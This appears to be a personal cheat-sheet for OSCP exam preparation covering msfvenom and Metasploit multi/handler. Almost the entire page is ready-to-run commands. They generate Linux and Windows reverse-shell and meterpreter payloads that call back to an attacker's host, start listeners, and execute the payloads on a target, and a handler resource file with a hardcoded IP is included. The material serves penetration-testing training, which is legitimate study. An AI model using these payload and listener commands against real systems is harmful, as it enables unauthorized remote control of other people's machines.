Skip to content

msfvenom

https://help.offsec.com/hc/en-us/articles/360040165632-OSCP-Exam-Guide#metasploit-restrictions
--
You may use the following against all of the target machines:
- multi handler (aka exploit/multi/handler)
- msfvenom
tmux setenv IP_LOCAL <local-ip>

linux - for OSCP


shell.elf

msfvenom -p linux/x64/shell_reverse_tcp LHOST=$IP_LOCAL LPORT=4444 -f elf > shell.elf
msfconsole
msfconsole -q -x "use multi/handler; set payload linux/x64/shell_reverse_tcp; set lhost $IP_LOCAL; set lport 4444; exploit"

windows - for OSCP


shell.exe

#echo $IP_LOCAL
msfvenom -p windows/x64/powershell_reverse_tcp LHOST=$IP_LOCAL LPORT=4444 -f exe > shell-4444-powershell.exe
msfvenom -p windows/x64/shell/reverse_tcp LHOST=$IP_LOCAL LPORT=4444 -f exe > shell-x64-4444-cmd.exe
msfvenom -p windows/shell_reverse_tcp LHOST=$IP_LOCAL LPORT=4444 -f exe > shell-4444-x86-cmd.exe
msfconsole
msfconsole -q -x "use multi/handler; set payload windows/x64/powershell_reverse_tcp; set lhost $IP_LOCAL; set lport 4444; exploit"
msfconsole -q -x "use multi/handler; set payload windows/x64/shell/reverse_tcp; set lhost $IP_LOCAL; set lport 4444; exploit"
msfconsole -q -x "use multi/handler; set payload windows/shell_reverse_tcp; set lhost $IP_LOCAL; set lport 4444; exploit"

.\shell.exe
powershell C:\shell.exe

not❗ for OSCP


Meterpreter linux - not❗ for OSCP

shell.elf

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=$LOCAL LPORT=4445 -f elf > shell.elf
msfconsole
msfconsole -q -x "use multi/handler; set payload linux/x64/meterpreter/reverse_tcp; set lhost $LOCAL; set lport 4444; exploit"

Meterpreter windows - not❗ for OSCP

shell.exe

echo $LOCAL
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=$LOCAL LPORT=4444 -f exe > shell-4444-meterpreter.exe
msfconsole
msfconsole -q -x "use multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set lhost $LOCAL; set lport 4444; exploit"

.\shell.exe
powershell C:\shell.exe

Meterpreter start from file

create handler.rc file

use multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 10.18.9.175
set LPORT 4444
run
run listener from file
msfconsole -r handler.rc

  • https://infinitelogins.com/2020/01/25/msfvenom-reverse-shell-payload-cheatsheet/